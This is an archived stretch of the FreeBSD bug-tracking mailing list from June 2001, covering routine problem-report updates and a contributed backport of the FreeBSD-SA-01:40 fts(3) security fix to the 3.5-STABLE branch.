State-Changed-From-To: open->feedback State-Changed-By: iedowse State-Changed-When: Wed Jun 6 17:43:57 PDT 2001 State-Changed-Why: Is this still a problem in more recent releases? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13630 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 17:47:25 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B522037B401; Wed, 6 Jun 2001 17:47:22 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f570lMG38992; Wed, 6 Jun 2001 17:47:22 -0700 (PDT) (envelope-from iedowse) Date: Wed, 6 Jun 2001 17:47:22 -0700 (PDT) From: Message-Id: <200106070047.f570lMG38992@freefall.freebsd.org> To: bhughes@tcac.net, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/13711: root fs not properly unmounted after shutdown -[rh], and not cl Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: root fs not properly unmounted after shutdown -[rh], and not cl State-Changed-From-To: open->closed State-Changed-By: iedowse State-Changed-When: Wed Jun 6 17:46:07 PDT 2001 State-Changed-Why: I assume this has been fixed; please submit further details if you can reproduce this on a recent release. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13711 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 17:50:12 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CA4B137B405; Wed, 6 Jun 2001 17:50:10 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f570oAT39220; Wed, 6 Jun 2001 17:50:10 -0700 (PDT) (envelope-from iedowse) Date: Wed, 6 Jun 2001 17:50:10 -0700 (PDT) From: Message-Id: <200106070050.f570oAT39220@freefall.freebsd.org> To: j_guojun@lbl.gov, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/14135: lpt1 nolonger exists after 3.2-RELEASE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: lpt1 nolonger exists after 3.2-RELEASE State-Changed-From-To: open->feedback State-Changed-By: iedowse State-Changed-When: Wed Jun 6 17:48:33 PDT 2001 State-Changed-Why: Is this still a problem in more recent releases? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14135 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 17:59:25 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CEDFD37B403; Wed, 6 Jun 2001 17:59:23 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f570xNh40021; Wed, 6 Jun 2001 17:59:23 -0700 (PDT) (envelope-from iedowse) Date: Wed, 6 Jun 2001 17:59:23 -0700 (PDT) From: Message-Id: <200106070059.f570xNh40021@freefall.freebsd.org> To: regisr@regix.com, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14240: compilation error: __cmpdi2 unresolved Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: compilation error: __cmpdi2 unresolved State-Changed-From-To: open->closed State-Changed-By: iedowse State-Changed-When: Wed Jun 6 17:53:35 PDT 2001 State-Changed-Why: Old release; maybe some sources were missing or corrupted. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14240 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 18: 4:47 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6708837B407; Wed, 6 Jun 2001 18:04:45 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5714i240542; Wed, 6 Jun 2001 18:04:44 -0700 (PDT) (envelope-from iedowse) Date: Wed, 6 Jun 2001 18:04:44 -0700 (PDT) From: Message-Id: <200106070104.f5714i240542@freefall.freebsd.org> To: cagney@tpgi.com.au, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/14257: error 6: panic: cannot mount root (2) - da2s1a vs da1s1a Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: error 6: panic: cannot mount root (2) - da2s1a vs da1s1a State-Changed-From-To: open->feedback State-Changed-By: iedowse State-Changed-When: Wed Jun 6 18:04:16 PDT 2001 State-Changed-Why: Is this still a problem with more recent releases? http://www.FreeBSD.org/cgi/query-pr.cgi?pr=14257 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 18: 7: 3 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E361537B40A; Wed, 6 Jun 2001 18:06:59 -0700 (PDT) (envelope-from iedowse@FreeBSD.org) Received: (from iedowse@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5716xL43426; Wed, 6 Jun 2001 18:06:59 -0700 (PDT) (envelope-from iedowse) Date: Wed, 6 Jun 2001 18:06:59 -0700 (PDT) From: Message-Id: <200106070106.f5716xL43426@freefall.freebsd.org> To: spe@neo.gen.oleane.fr, iedowse@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/13517: Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: State-Changed-From-To: feedback->closed State-Changed-By: iedowse State-Changed-When: Wed Jun 6 18:05:55 PDT 2001 State-Changed-Why: Mail to submitter bounces. http://www.FreeBSD.org/cgi/query-pr.cgi?pr=13517 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 18:12:19 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from mailman.zeta.org.au (mailman.zeta.org.au [203.26.10.16]) by hub.freebsd.org (Postfix) with ESMTP id BB38A37B403; Wed, 6 Jun 2001 18:12:15 -0700 (PDT) (envelope-from bde@zeta.org.au) Received: from bde.zeta.org.au (bde.zeta.org.au [203.2.228.102]) by mailman.zeta.org.au (8.9.3/8.8.7) with ESMTP id LAA10972; Thu, 7 Jun 2001 11:12:12 +1000 Date: Thu, 7 Jun 2001 11:10:33 +1000 (EST) From: Bruce Evans X-Sender: bde@besplex.bde.org To: phk@FreeBSD.ORG Cc: kenji.rikitake@acm.org, freebsd-bugs@FreeBSD.ORG Subject: Re: kern/16816: vop_stdpoll() in /sys/kern/vfs_default.c does not handle POLLIN/POLLOUT In-Reply-To: <200106062046.f56KkIR83231@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 6 Jun 2001 phk@FreeBSD.ORG wrote: > Synopsis: vop_stdpoll() in /sys/kern/vfs_default.c does not handle POLLIN/POLLOUT > > State-Changed-From-To: open->closed > State-Changed-By: phk > State-Changed-When: Wed Jun 6 13:46:09 PDT 2001 > State-Changed-Why: > fixed. Still not fixed in RELENG_4. Please give details when closing PRs. You should at least say when it was fixed. RCS file: /home/ncvs/src/sys/kern/vfs_default.c,v Working file: vfs_default.c head: 1.53 ... ---------------------------- revision 1.51 date: 2001/05/14 14:37:25; author: jlemon; state: Exp; lines: +4 -4 When calling poll() on a fd associated with a filesystem, let POLLIN/POLLOUT behave identically to POLLRDNORM/POLLWRNORM. Submitted by: bde PR: 27287 merge after: 1 week ---------------------------- Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 21: 0:28 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9D67437B405 for ; Wed, 6 Jun 2001 21:00:16 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5740Gg65030; Wed, 6 Jun 2001 21:00:16 -0700 (PDT) (envelope-from gnats) Received: from www.svzserv.kemerovo.su (www.svzserv.kemerovo.su [213.184.65.80]) by hub.freebsd.org (Postfix) with ESMTP id 526F237B401 for ; Wed, 6 Jun 2001 20:52:16 -0700 (PDT) (envelope-from eugen@www.svzserv.kemerovo.su) Received: (from eugen@localhost) by www.svzserv.kemerovo.su (8.9.3/8.9.3) id LAA38904; Thu, 7 Jun 2001 11:52:13 +0800 (KRAST) (envelope-from eugen) Message-Id: <200106070352.LAA38904@www.svzserv.kemerovo.su> Date: Thu, 7 Jun 2001 11:52:13 +0800 (KRAST) From: eugen@grosbein.pp.ru Reply-To: eugen@www.svzserv.kemerovo.su To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/27922: FreeBSD-SA-01:40 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27922 >Category: bin >Synopsis: FreeBSD-SA-01:40 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Wed Jun 06 21:00:16 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Eugene Grosbein >Release: FreeBSD 3.5-STABLE i386 >Organization: ISP Svyaz-Service >Environment: FreeBSD 3.5-STABLE i386 >Description: A patch in FreeBSD Security Advisory FreeBSD-SA-01:40 does not apply to 3.5-STABLE. Here is a path from advisory adopted for RELENG_3 at the time of advisory issue. >How-To-Repeat: Exploit has been posted to security@freebsd.org mailing list. >Fix: Here is a patch for 3.5-STABLE build 10 May 2001. How to apply: # cd /usr/src/lib/libc/gen # patch fts_options & (opt)) #define SET(opt) (sp->fts_options |= (opt)) -#define CHDIR(sp, path) (!ISSET(FTS_NOCHDIR) && chdir(path)) #define FCHDIR(sp, fd) (!ISSET(FTS_NOCHDIR) && fchdir(fd)) /* fts_build flags */ @@ -273,6 +272,7 @@ fts_read(sp) register FTS *sp; { + struct stat sb; register FTSENT *p, *tmp; register int instr; register char *t; @@ -349,7 +349,7 @@ * FTS_STOP or the fts_info field of the node. */ if (sp->fts_child) { - if (fts_safe_changedir(sp, p, -1)) { + if (fts_safe_changedir(sp, p, -1, p->fts_accpath)) { p->fts_errno = errno; p->fts_flags |= FTS_DONTCHDIR; for (p = sp->fts_child; p; p = p->fts_link) @@ -446,11 +446,10 @@ return (NULL); } (void)close(p->fts_symfd); - } else if (!(p->fts_flags & FTS_DONTCHDIR)) { - if (CHDIR(sp, "..")) { - SET(FTS_STOP); - return (NULL); - } + } else if (!(p->fts_flags & FTS_DONTCHDIR) && + fts_safe_changedir(sp, p->fts_parent, -1, "..")) { + SET(FTS_STOP); + return (NULL); } p->fts_info = p->fts_errno ? FTS_ERR : FTS_DP; return (sp->fts_cur = p); @@ -637,7 +636,7 @@ */ cderrno = 0; if (nlinks || type == BREAD) { - if (fts_safe_changedir(sp, cur, dirfd(dirp))) { + if (fts_safe_changedir(sp, cur, dirfd(dirp), NULL)) { if (nlinks && type == BREAD) cur->fts_errno = errno; cur->fts_flags |= FTS_DONTCHDIR; @@ -803,7 +802,8 @@ */ if (descend && (type == BCHILD || !nitems) && (cur->fts_level == FTS_ROOTLEVEL ? - FCHDIR(sp, sp->fts_rfd) : CHDIR(sp, ".."))) { + FCHDIR(sp, sp->fts_rfd) : + fts_safe_changedir(sp, cur->fts_parent, -1, ".."))) { cur->fts_info = FTS_ERR; SET(FTS_STOP); return (NULL); @@ -1075,10 +1075,11 @@ * Assumes p->fts_dev and p->fts_ino are filled in. */ static int -fts_safe_changedir(sp, p, fd) +fts_safe_changedir(sp, p, fd, path) FTS *sp; FTSENT *p; int fd; + char *path; { int ret, oerrno, newfd; struct stat sb; @@ -1086,7 +1087,7 @@ newfd = fd; if (ISSET(FTS_NOCHDIR)) return (0); - if (fd < 0 && (newfd = open(p->fts_accpath, O_RDONLY, 0)) < 0) + if (fd < 0 && (newfd = _open(path, O_RDONLY, 0)) < 0) return (-1); if (fstat(newfd, &sb)) { ret = -1; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 21:51:44 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from david.siemens.de (david.siemens.de [192.35.17.14]) by hub.freebsd.org (Postfix) with ESMTP id AF3E437B403; Wed, 6 Jun 2001 21:51:41 -0700 (PDT) (envelope-from andre.albsmeier@mchp.siemens.de) X-Envelope-Sender-Is: andre.albsmeier@mchp.siemens.de (at relayer david.siemens.de) Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14]) by david.siemens.de (8.11.0/8.11.0) with ESMTP id f574pe526925; Thu, 7 Jun 2001 06:51:40 +0200 (MET DST) Received: from curry.mchp.siemens.de (curry.mchp.siemens.de [139.25.42.7]) by mail1.siemens.de (8.11.0/8.11.0) with ESMTP id f574pC709987; Thu, 7 Jun 2001 06:51:12 +0200 (MET DST) Received: (from localhost) by curry.mchp.siemens.de (8.11.3/8.11.3) id f574pCu50511; Date: Thu, 7 Jun 2001 06:51:12 +0200 From: Andre Albsmeier To: jdp@FreeBSD.org Cc: andre.albsmeier@mchp.siemens.de, freebsd-bugs@FreeBSD.org Subject: Re: bin/27457: yppush fails when updating two or more slaves Message-ID: <20010607065112.B89754@curry.mchp.siemens.de> References: <200106062125.f56LP4m90438@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106062125.f56LP4m90438@freefall.freebsd.org>; from jdp@FreeBSD.org on Wed, Jun 06, 2001 at 02:25:04PM -0700 X-Echelon: BND CIA NSA Mossad KGB MI6 IRA detonator nuclear assault strike Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It fixes it :-) Thanks again, -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 22:26:52 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E9A6A37B405; Wed, 6 Jun 2001 22:26:50 -0700 (PDT) (envelope-from jlemon@FreeBSD.org) Received: (from jlemon@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f575Qof78704; Wed, 6 Jun 2001 22:26:50 -0700 (PDT) (envelope-from jlemon) Date: Wed, 6 Jun 2001 22:26:50 -0700 (PDT) From: Message-Id: <200106070526.f575Qof78704@freefall.freebsd.org> To: dnelson@emsphone.com, jlemon@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/23150: sscanf is used on a buffer that is not NULL-terminated Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: sscanf is used on a buffer that is not NULL-terminated State-Changed-From-To: open->closed State-Changed-By: jlemon State-Changed-When: Wed Jun 6 22:26:39 PDT 2001 State-Changed-Why: Fix committed, thanks! http://www.FreeBSD.org/cgi/query-pr.cgi?pr=23150 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 22:30: 5 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F367A37B409 for ; Wed, 6 Jun 2001 22:30:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f575U1379044; Wed, 6 Jun 2001 22:30:01 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 22:30:01 -0700 (PDT) Message-Id: <200106070530.f575U1379044@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Sergey N. Voronkov" Subject: Re: bin/27922: FreeBSD-SA-01:40 Reply-To: "Sergey N. Voronkov" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27922; it has been noted by GNATS. From: "Sergey N. Voronkov" To: eugen@www.svzserv.kemerovo.su Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/27922: FreeBSD-SA-01:40 Date: Thu, 7 Jun 2001 11:27:14 +0600 On Thu, Jun 07, 2001 at 11:52:13AM +0800, eugen@grosbein.pp.ru wrote: > >Environment: > FreeBSD 3.5-STABLE i386 > > >Description: > > A patch in FreeBSD Security Advisory FreeBSD-SA-01:40 does not apply to > 3.5-STABLE. Here is a path from advisory adopted for RELENG_3 at the time of > advisory issue. > > >How-To-Repeat: > > Exploit has been posted to security@freebsd.org mailing list. > RELENG_3 branch declared to support ONLY fixes of remote exploits (see http://docs.freebsd.org/cgi/getmsg.cgi?fetch=3320+0+archive/2001/ freebsd-announce/20010513.freebsd-announce). Bye, Serg N. Voronkov. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 22:50: 6 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2ADE237B406 for ; Wed, 6 Jun 2001 22:50:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f575o3Z80521; Wed, 6 Jun 2001 22:50:03 -0700 (PDT) (envelope-from gnats) Date: Wed, 6 Jun 2001 22:50:03 -0700 (PDT) Message-Id: <200106070550.f575o3Z80521@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Eugene Grosbein Subject: Re: bin/27922: FreeBSD-SA-01:40 Reply-To: Eugene Grosbein Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/27922; it has been noted by GNATS. From: Eugene Grosbein To: "Sergey N. Voronkov" Cc: eugen@www.svzserv.kemerovo.su, FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/27922: FreeBSD-SA-01:40 Date: Thu, 07 Jun 2001 13:47:33 +0800 > > A patch in FreeBSD Security Advisory FreeBSD-SA-01:40 does not apply to > > 3.5-STABLE. Here is a path from advisory adopted for RELENG_3 at the time of > > advisory issue. > > > > >How-To-Repeat: > > > > Exploit has been posted to security@freebsd.org mailing list. > > > > RELENG_3 branch declared to support ONLY fixes of remote exploits (see > http://docs.freebsd.org/cgi/getmsg.cgi?fetch=3320+0+archive/2001/ > freebsd-announce/20010513.freebsd-announce). I know. It was said, if someone will supply patches for RELENG_3, they will be consideted, so I corrected the patch. Eugene Grosbein To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Wed Jun 6 23: 4:22 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4A75E37B403; Wed, 6 Jun 2001 23:04:20 -0700 (PDT) (envelope-from roam@FreeBSD.org) Received: (from roam@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f5764KJ81850; Wed, 6 Jun 2001 23:04:20 -0700 (PDT) (envelope-from roam) Date: Wed, 6 Jun 2001 23:04:20 -0700 (PDT) From: Message-Id: <200106070604.f5764KJ81850@freefall.freebsd.org> To: roam@FreeBSD.org, freebsd-bugs@FreeBSD.org, security-officer@FreeBSD.org Subject: Re: bin/27922: FreeBSD-SA-01:40 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: FreeBSD-SA-01:40 Responsible-Changed-From-To: freebsd-bugs->security-officer Responsible-Changed-By: roam Responsible-Changed-When: Wed Jun 6 23:03:54 PDT 2001 Responsible-Changed-Why: Let's see if this works :) http://www.FreeBSD.org/cgi/query-pr.cgi?pr=27922 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 0:13:20 2001 Delivered-To: freebsd-bugs@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id A2A3137B401; Thu, 7 Jun 2001 00:13:13 -0700 (PDT) (envelope-from ru@whale.sunbay.crimea.ua) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.2/8.11.2) id f577DAE29736; Thu, 7 Jun 2001 10:13:10 +0300 (EEST) (envelope-from ru) Date: Thu, 7 Jun 2001 10:13:10 +0300 From: Ruslan Ermilov To: phk@FreeBSD.ORG Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: bin/16812: level 0 dump runs forever -- generates a backup much larger than the available disk. Message-ID: <20010607101310.E26609@sunbay.com> Mail-Followup-To: phk@FreeBSD.ORG, freebsd-bugs@FreeBSD.ORG References: <200106062054.f56Ks2u84180@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200106062054.f56Ks2u84180@freefall.freebsd.org>; from phk@FreeBSD.ORG on Wed, Jun 06, 2001 at 01:54:02PM -0700 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 06, 2001 at 01:54:02PM -0700, phk@FreeBSD.ORG wrote: > Synopsis: level 0 dump runs forever -- generates a backup much larger than the available disk. > > State-Changed-From-To: open->closed > State-Changed-By: phk > State-Changed-When: Wed Jun 6 13:53:44 PDT 2001 > State-Changed-Why: > Sounds like you need a full FSCK and a find to locate sparse files. > > http://www.FreeBSD.org/cgi/query-pr.cgi?pr=16812 > Any insight on how find(1) could be used to locate sparse files? And shouldn't dump(8) handle sparse files intelligently? Cheers, -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 0:40: 8 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7FD9037B401 for ; Thu, 7 Jun 2001 00:40:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f577e3B96171; Thu, 7 Jun 2001 00:40:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 7 Jun 2001 00:40:03 -0700 (PDT) Message-Id: <200106070740.f577e3B96171@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: misc/27915: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR misc/27915; it has been noted by GNATS. From: Ruslan Ermilov To: wmoran@iowna.com Cc: freebsd-gnats-submit@FreeBSD.ORG, nectar@FreeBSD.ORG Subject: Re: misc/27915: man 5 passwd does not properly explain the format of /etc/passwd and /etc/master.passwd Date: Thu, 7 Jun 2001 10:35:38 +0300 This bug is only present in RELENG_4. If (?) the nsswitch support will be imported into RELENG_4, this bug will be automatically fixed. On Wed, Jun 06, 2001 at 03:13:45PM -0700, wmoran@iowna.com wrote: > man 5 passwd attempts to describe the format of the /etc/passwd file, > but incorrectly describes the /etc/master.passwd file while claiming > to describe /etc/passwd. Cheers, -- Ruslan Ermilov Oracle Developer/DBA, ru@sunbay.com Sunbay Software AG, ru@FreeBSD.org FreeBSD committer, +380.652.512.251 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 5:10:11 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 038F337B408 for ; Thu, 7 Jun 2001 05:10:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57CA1f46613; Thu, 7 Jun 2001 05:10:01 -0700 (PDT) (envelope-from gnats) Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7025837B409 for ; Thu, 7 Jun 2001 05:06:02 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: (from nobody@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57C62K46374; Thu, 7 Jun 2001 05:06:02 -0700 (PDT) (envelope-from nobody) Message-Id: <200106071206.f57C62K46374@freefall.freebsd.org> Date: Thu, 7 Jun 2001 05:06:02 -0700 (PDT) From: belgaut@netrover.com To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/27934: My sound card Aureal with chip 8830 ( vortex 2 ) no work Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 27934 >Category: i386 >Synopsis: My sound card Aureal with chip 8830 ( vortex 2 ) no work >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 07 05:10:01 PDT 2001 >Closed-Date: >Last-Modified: >Originator: Sylvain Bellemare >Release: FreeBsd 4.3 >Organization: prive >Environment: >Description: I make a kernel all work fine but in the /modules snd_au88 is not in place >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 7 5:20: 7 2001 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7FCC537B405 for ; Thu, 7 Jun 2001 05:20:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.3/8.11.3) id f57CK3M47567; Thu, 7 Jun 2001 05:20:03 -0700 (PDT) (envelope-from gnats) Date: Thu, 7 Jun 2001 05:20:03 -0700 (PDT) Message-Id: <200106071220.f57CK3M47567@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Peter Pentchev Subject: Re: i386/27934: My sound card Aureal with chip 8830 ( vortex 2 ) no work Reply-To: Peter Pentchev Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following 